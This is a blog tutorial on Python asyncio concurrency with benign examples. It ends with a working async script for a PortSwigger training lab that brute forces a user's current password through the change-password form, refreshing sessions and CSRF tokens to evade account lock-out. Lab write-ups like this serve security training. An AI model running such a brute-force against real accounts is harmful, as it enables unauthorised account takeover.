Hi there, this doc is gonna be loooong so you might need to grab some coffee

In penetration testing, speed can make all the difference (as long as you're not getting caught). The faster your scripts can send requests, gather responses, and process results, the more time you have for actual analysis. With normal synchronous Python scripts, every task waits for the one before it to finish: safe, but slow.

That’s why I turned to async programming with asyncio. By running multiple tasks at once, asyncio transformed one of my scripts from sluggish to blazing fast, even outperforming Burp Suite Pro in certain cases. In this post, I’ll share how I used asyncio in a real pentesting lab and why it’s quickly becoming one of my favorite tools for automation.

What is asynchronous programming?

Imagine you write some code like this:

python
import time

def download_file(file):
    print(f"Downloading {file}")
    time.sleep(2)  # imagine the file takes 2 seconds to download
    print(f"{file} Downloaded")

def main():
    download_file("file1")
    download_file("file2")

main()

In code like this, if each file needs 2 seconds to download, the whole thing takes 4 seconds, and the output will look like this:

python
Downloading file1
2 seconds sleep
file1 Downloaded
Downloading file2
2 seconds sleep 
file2 Downloaded

But what if I told you I can make it take only 2 seconds?

  • 2 seconds of difference? Not a big deal, right? The trick is that in real scripts you're not sending 2 requests, you're sending hundreds or even thousands of them, so it saves a lot of time.

Concurrency

There is more than one way to structure code so that it runs concurrently.

But what is concurrency in the first place? It's the idea of structuring programs so multiple tasks can make progress together.

And there is more than one way to apply it:

  1. Multi-threading → multiple threads in one process. Good for I/O-bound tasks (network calls, reading files), but we don't want that extra CPU overhead for a simple script.

  2. Multi-processing → spawns multiple processes. True parallelism, great for CPU-bound work, but heavier than threading.

  3. Asynchronous → single-threaded, cooperative multitasking. Best for high-volume I/O tasks (like thousands of HTTP requests), which is exactly what we're looking for, especially because it puts very little overhead on the processor.

Asynchronous Programming

We are going to make the application look like it's running multi-threaded when in fact it's single-threaded: when a request takes a break (an I/O operation) it doesn't hold up the whole app, it gives up its place to another request, and so on, one in, one out.

Python asyncio

So I will be using Python to illustrate the idea, but you can use any language you want.

💡
Make sure to read the comments in the code

Event loop in Asyncio

  • Think of it like a circle that all the tasks run around, waiting for their chance to get executed.

  • If a task gets its chance inside that circle, starts executing, and then needs some I/O time, it won't waste time by keeping the other tasks out of the circle; it steps aside and makes room for another task to get in and execute alongside it.

  • When the I/O is done, the task gets resumed and completed, and so on.

Coroutine

  • A coroutine is a special kind of function that can pause and resume later.

    We use the async keyword to define these coroutine functions.

python
import asyncio  
async def main(): 
    print("start of main coroutine")  
      
asyncio.run(main())
  • A coroutine function doesn't run directly when called; it returns a coroutine object.

  • So if we just called main() without asyncio.run(main()), it wouldn't run; it would just return something called a coroutine object. But since we call the function inside asyncio.run(), we don't notice the difference: it takes that returned object and uses it to run the coroutine for us, as the sketch below shows.
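
A quick sketch of that (the exact memory address in the printed object will of course differ):

python
import asyncio

async def main():
    print("start of main coroutine")

coro = main()      # nothing runs yet, we just get a coroutine object
print(coro)        # <coroutine object main at 0x...>

asyncio.run(coro)  # now the event loop actually executes it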

The await keyword is what actually executes (or resumes) a coroutine, and it can't be used outside an async function. Let's take a look at this example:

python
import asyncio

async def fetch_data(delay):  # defines a coroutine that simulates time-consuming task
    print('Fetching data...')
    await asyncio.sleep(delay)  # simulates I/O operation with a sleep
    print("Data Fetched")
    return {
        "data": "some data"  # return some data
    }

async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = fetch_data(2)

    result = await task  # await the fetch_data coroutine, pausing execution of main until the fetch_data completes
    print(f"received result: {result}")
    print("end of main coroutine")

asyncio.run(main())  # run the main coroutine

So the output will be:
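
(Reconstructed here since the screenshot isn't included; this is what the code above prints.)

python
start of main coroutine
Fetching data...
Data Fetched
received result: {'data': 'some data'}
end of main coroutine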

You might think: if await pauses the execution, where is the difference? It looks like a synchronous function, since we're just waiting for the result. That's a valid point, but only in this example, because we gave the event loop only one coroutine. While it's paused, the event loop looks around and asks if there is anything else to do, and since there isn't, it just waits. But look at this example:
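
(That example isn't shown in the text version of the post; it was presumably something like this, two awaits one after the other with nothing scheduled ahead of time, reusing fetch_data from above.)

python
async def main():
    print("start of main coroutine")
    result1 = await fetch_data(2)   # main pauses here for the full 2 seconds
    print(f"received result: {result1}")
    result2 = await fetch_data(2)   # only now does the second fetch even start
    print(f"received result: {result2}")
    print("end of main coroutine")

asyncio.run(main())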

  • Still there is no difference: it will also wait for the first one to be done and only then go for the second one.

  • Why does this happen?

    Even though we made 2 coroutines, we didn't schedule them on the event loop before task 1 started.

How to Schedule a task, first way!

One of the ways to schedule a task is asyncio.create_task(function_name()).

python
async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = asyncio.create_task(fetch_data(2))
    result = await task  # await the fetch_data coroutine, pausing execution of main until the fetch_data completes
    print(f"received result: {result}")

    background_task = asyncio.create_task(background())
    await background_task
    print("end of main coroutine")

Still nothing happens, because I scheduled the background task only after the first one had already paused the main coroutine.

So, TL;DR: you have to create both tasks before you await either of them if you want the event loop to switch between them.

python
import asyncio
async def fetch_data(delay):  # defines a coroutine that simulates time-consuming task
    print('Fetching data...')
    await asyncio.sleep(delay)  # simulates I/O operation with a sleep
    print("Data Fetched")
    return {
        "data": "some data"  # return some data
    }
    
async def background():  # another coroutine
    for i in range(5):  # normal loop
        print(f"background {i}")  # print which step we are at
        await asyncio.sleep(0.4)  # wait 0.4 seconds, so 5 steps take exactly 2 seconds: the waiting time of fetch_data

async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = asyncio.create_task(fetch_data(2))
    background_task = asyncio.create_task(background())
    result = await task  # await the fetch_data coroutine, pausing execution of main until the fetch_data completes
    print(f"received result: {result}")
    await background_task
    print("end of main coroutine")

asyncio.run(main())  # run the main coroutine

And here comes the wonder:
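
(Reconstructed from the code since the screenshot isn't included; the exact interleaving right around the 2-second mark can vary, which is discussed below.)

python
start of main coroutine
Fetching data...
background 0
background 1
background 2
background 3
background 4
Data Fetched
received result: {'data': 'some data'}
end of main coroutine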

Even though create_task schedules the coroutine and it runs, we still need to await it.
Why should we use await even though it will run anyway?

  1. You risk it being cancelled early.

  2. You won't know when it is done.

  3. You can't access its results.

Why might it get cancelled? Because if we don't pause the execution of the main coroutine, the application will exit once main is done. So if the main coroutine is short, like printing a statement without any await, we exit right after that statement is printed, even if the second coroutine (background or fetch) isn't done yet.

What happens if the paused coroutine finishes its I/O while the coroutine running right now doesn't have any I/O to do?

Think of the question like this:

I gave my spot to someone because I didn't need it right then, but when I needed it back he wasn't done yet. Do I kick him out, or do I wait for him to finish?

So what happened is: we scheduled both of them → awaited the first one → it blocked on I/O, so we switched to the second coroutine (background). But background doesn't have any sleep left after its 2 seconds, so should it keep running and then return to fetch_data, or should it go back to fetch_data and come back later to finish background?

This situation is tricky and its result isn't guaranteed; it could go either way, but usually the coroutine that was paused first gets resumed first.

So let's look at this code:

python
async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = asyncio.create_task(fetch_data(2))
    background_task = asyncio.create_task(background())
    result = await task
    print(f"received result: {result}")
    print("end of main coroutine")
  • This is the exact code from above, but with await background_task deleted from the main function.

  • Remember when we said that if we don't use await, a task might get cancelled early? Here is proof of that.

  • What is guaranteed in that code is that it will print:

    • start of main coroutine

    • Fetching data...

    • background 0 through 4

  • What happens after that:

    • it might finish background and print whatever is left of it

    • it might also go back to fetch_data and then come back to background

  • But there is one outcome worth calling out:

    • it could go to fetch_data, then back to main with the result, and since we never awaited background it will print the received result and end of main coroutine and exit without printing what we expected

Note that await → pauses the coroutine and waits for the other coroutine to hand back its result, and it also → makes sure we continue from where we paused.

How to Schedule a task, second way!

  • Instead of creating each task on its own, we can use what's known as the gather function.

  • It is a faster way to create multiple tasks and await them all in the same line of code.

python
import asyncio

async def fetch_data(id, sleep_time):
    print(f"Coroutine {id} starting to fetch data")
    await asyncio.sleep(sleep_time)
    return {
        "id": id,
        "data": f"sample data from coroutine {id}"
    }

async def main():
    results = await asyncio.gather(fetch_data(1,2), fetch_data(2,1), fetch_data(3,3))

    for result in results:
        print(f"received result: {result}")

asyncio.run(main())

You can even use a list comprehension inside the gather function to make task creation even faster, but gather has its problems:

  • It isn't very good with error handling: if one coroutine raises an error, gather gives up on the whole run unless you handle each error manually.

  • But there is an option, await asyncio.gather(func(), func(), func(), return_exceptions=True), which returns the exception as a result instead of breaking the program, as sketched below.
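
A small sketch combining both ideas, unpacking a comprehension into gather and keeping exceptions as results (reusing fetch_data from the previous snippet):

python
async def main():
    results = await asyncio.gather(
        *[fetch_data(i, 1) for i in range(5)],  # build all the coroutines in one comprehension
        return_exceptions=True                  # failures come back as exception objects
    )
    for result in results:
        if isinstance(result, Exception):
            print(f"failed: {result}")
        else:
            print(f"received result: {result}")

asyncio.run(main())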

How to Schedule a task, third way!

Using TaskGroup. It is like gather but with better error propagation and task cancellation. Let's see the difference.

  • What happens on failure:

    • gather(): you get only the exception that caused the failure (the first one it encounters); the other awaitables aren't cancelled, they just keep running in the background.

    • TaskGroup: cancels the remaining tasks and collects the exceptions it finds on the way back (any that occurred before the cancellation could stop them).

The next script is gather, with return_exceptions=False, which is the default.

(Screenshot: the gather example with two failing coroutines, API-1 and API-2.)
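
The script from the screenshot isn't reproduced here; it was presumably something along these lines (the fetch_api name is my own, the point is just two coroutines that both raise):

python
import asyncio

async def fetch_api(name, delay):
    await asyncio.sleep(delay)
    raise Exception(f"{name} failed")  # simulate a failing request

async def main():
    try:
        await asyncio.gather(fetch_api("API-1", 1), fetch_api("API-2", 1))
    except Exception as e:
        print(f"caught: {e}")  # only the first exception makes it here

asyncio.run(main())

Run like that, typically only "caught: API-1 failed" is printed; the API-2 exception never surfaces.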

So the output isn't a clean execution: the other error that was raised (API-2) is never returned. That happens because gather gives up on the first failure and returns only the exception that caused it, unless you use return_exceptions=True, which returns this instead:

(Screenshot of the output with return_exceptions=True: both exceptions come back inside the results list instead of crashing the program.)

But with TaskGroup, the remaining tasks get cancelled and all the exceptions found so far are returned, especially if both errors are raised at the same moment, as in the next script:

(Screenshot: the TaskGroup version of the same two failing coroutines.)
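
A hedged sketch of that TaskGroup version (Python 3.11+), reusing the same failing coroutine:

python
import asyncio

async def fetch_api(name, delay):
    await asyncio.sleep(delay)
    raise Exception(f"{name} failed")

async def main():
    try:
        async with asyncio.TaskGroup() as tg:
            tg.create_task(fetch_api("API-1", 1))
            tg.create_task(fetch_api("API-2", 1))
    except* Exception as eg:
        for exc in eg.exceptions:
            print(f"caught: {exc}")  # both exceptions show up in the group

asyncio.run(main())

Run that way, both "caught: API-1 failed" and "caught: API-2 failed" get printed.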

And this is the output. What happened is that both coroutines woke up from sleep at the same time, so both raised their error around the same exact moment. The difference between the two comes down to how each handles errors internally, the timing of exception processing. Both stop the run, but:

  • gather(): Fails fast - processes the first exception immediately

  • TaskGroup: Waits to collect all exceptions that occur during the brief cancellation window

And this difference actually shows up if you look at this:

python
# gather() - traditional single exception
try:
    await asyncio.gather(...)
except Exception as e:  # only one exception to deal with
    ...

# TaskGroup - exception groups (PEP 654)
try:
    async with asyncio.TaskGroup():
        ...
except* Exception as eg:  # ExceptionGroup containing multiple exceptions
    for exc in eg.exceptions:
        ...

TaskGroup expects multiple errors, so when I used a plain except Exception with TaskGroup, without the * for unpacking, I still got an error.

(Screenshot of the resulting error.)

Even when I made sure that only one error would be returned, I still got that error. All of this happens because of something called futures, which we will get to later.

Another reason for that:

python
# gather() - can only store one exception
master_future.set_exception(first_exception)  # Overwrites any previous

# TaskGroup - accumulates exceptions
exception_list.append(exception1)
exception_list.append(exception2)
exception_list.append(exception3)

Futures

  • A Future is an object that represents a computation that hasn't completed yet; think of it like a promise or a placeholder. It gets settled either by:

    • Completion (set_result(value))

    • Failure (set_exception(error))

    • Cancellation (.cancel())

    • Done → whether the future is finished (by success, error, or cancellation)

  • So it tells you two things:

    • done or not

    • and if done, in what state exactly → completion, failure, cancelled

python
master_future = asyncio.Future() # gather() internally does something like:

# When first task fails:
master_future.set_exception(first_exception)  # Future can only hold ONE exception
# Other exceptions are lost because Future is already "done" with an exception
python
# TaskGroup internally does something like:
task_futures = []  # List of individual futures
exception_list = []  # Separate collection for exceptions

# When tasks fail:
for future in task_futures:
    if future.done() and future.exception():
        exception_list.append(future.exception())  # Collect ALL exceptions

# Then wraps them in ExceptionGroup
raise ExceptionGroup("Multiple exceptions", exception_list)
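
To make that less abstract, here is a minimal, hedged example of using a Future directly: one coroutine awaits it as a placeholder while another completes it.

python
import asyncio

async def set_after(fut, delay, value):
    await asyncio.sleep(delay)
    fut.set_result(value)            # complete the future

async def main():
    loop = asyncio.get_running_loop()
    fut = loop.create_future()       # an empty placeholder, not done yet
    asyncio.create_task(set_after(fut, 1, "some data"))
    print("done yet?", fut.done())   # False
    print("result:", await fut)      # pauses here until set_result() fires
    print("done yet?", fut.done())   # True

asyncio.run(main())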

Semaphore

It is a control tool that limits how many tasks can access a resource at the same time.

python
import asyncio

sem = asyncio.Semaphore(3)  # allow 3 concurrent accesses

async def task(id):
    print(f"Task {id} waiting...")
    async with sem:  # acquire the semaphore
        print(f"Task {id} acquired semaphore ✅")
        await asyncio.sleep(2)
        print(f"Task {id} releasing semaphore ❌")

async def main():
    await asyncio.gather(*(task(i) for i in range(6)))

asyncio.run(main())

The output looks like this:
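
(Reconstructed from the code above since the screenshot isn't included; the exact ordering within each group of three can vary.)

python
Task 0 waiting...
Task 0 acquired semaphore ✅
Task 1 waiting...
Task 1 acquired semaphore ✅
Task 2 waiting...
Task 2 acquired semaphore ✅
Task 3 waiting...
Task 4 waiting...
Task 5 waiting...
Task 0 releasing semaphore ❌
Task 1 releasing semaphore ❌
Task 2 releasing semaphore ❌
Task 3 acquired semaphore ✅
Task 4 acquired semaphore ✅
Task 5 acquired semaphore ✅
Task 3 releasing semaphore ❌
Task 4 releasing semaphore ❌
Task 5 releasing semaphore ❌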

  • Imagine it like an office: the office's door starts at async with sem, and from that point on there is a maximum capacity, so in the last example we couldn't handle more than 3 people at the same time.

  • But while those people are taking their time inside, the next group can wait right outside and get ready for their turn (the Task {id} waiting... print in this case).

real-world example (easier to understand)

This is the script for one of the PortSwigger labs, about authentication attacks, titled Lab: Password brute-force via password change.

In this lab we want to brute force the current password parameter, but we get blocked if we make too many wrong password attempts.

So we have to re-login before each attempt to grab a new session and a fresh CSRF token.

With that many requests, the brute force takes a long time, even with the Burp Suite Pro edition.

So why don't we write a script for it?

The script is commented by an AI model, so pay some attention (it might have missed something).
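
The original script isn't reproduced in this text version of the post, so here is a heavily simplified sketch of the same idea, assuming aiohttp for the HTTP side. The lab URL, credentials, wordlist path, form field names, and the success check are all placeholders you would need to adapt to the actual lab.

python
import asyncio
import re
import aiohttp

# Everything below is a placeholder sketch, not the original script.
LAB = "https://YOUR-LAB-ID.web-security-academy.net"
TARGET_USER = "carlos"                       # account whose password we brute force
WORDLIST = open("passwords.txt").read().split()

sem = asyncio.Semaphore(20)                  # cap concurrent attempts

async def get_csrf(session, path):
    # pull the CSRF token out of the form on the given page
    async with session.get(LAB + path) as resp:
        html = await resp.text()
    match = re.search(r'name="csrf" value="([^"]+)"', html)
    return match.group(1) if match else None

async def try_password(password):
    async with sem:
        # fresh session per attempt -> fresh cookies, so the lock-out doesn't kick in
        async with aiohttp.ClientSession() as session:
            csrf = await get_csrf(session, "/login")
            async with session.post(LAB + "/login", data={
                "csrf": csrf, "username": "wiener", "password": "peter",
            }):
                pass
            csrf = await get_csrf(session, "/my-account")
            async with session.post(LAB + "/my-account/change-password", data={
                "csrf": csrf,
                "username": TARGET_USER,
                "current-password": password,   # the value being brute forced
                "new-password-1": "a",
                "new-password-2": "b",          # mismatched on purpose
            }) as resp:
                body = await resp.text()
    # heuristic: a "passwords do not match" style message means the current password was right
    if "do not match" in body:
        print(f"[+] current password is probably: {password}")

async def main():
    await asyncio.gather(*(try_password(p) for p in WORDLIST))

asyncio.run(main())

The semaphore is there to keep the concurrency sane so the lab (and your connection) doesn't fall over.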

And with that script I solved the lab in under 4 minutes.

From 45 minutes with sequential Python, to 23 minutes with Burp Pro, to 4 minutes with asyncio.

Wrapping up

So that was it -what! You need more? It already looks like it's gonna be a 40-minute read-

It's okay if you didn't figure it all out at once, but you have AI models: go have some chit chat with any of them for a deeper understanding.

Stay tuned for a lot of stuff coming out soon -I'm doing a lot of scripting and tools these days-

feel free to reach out to me


Adios Amigos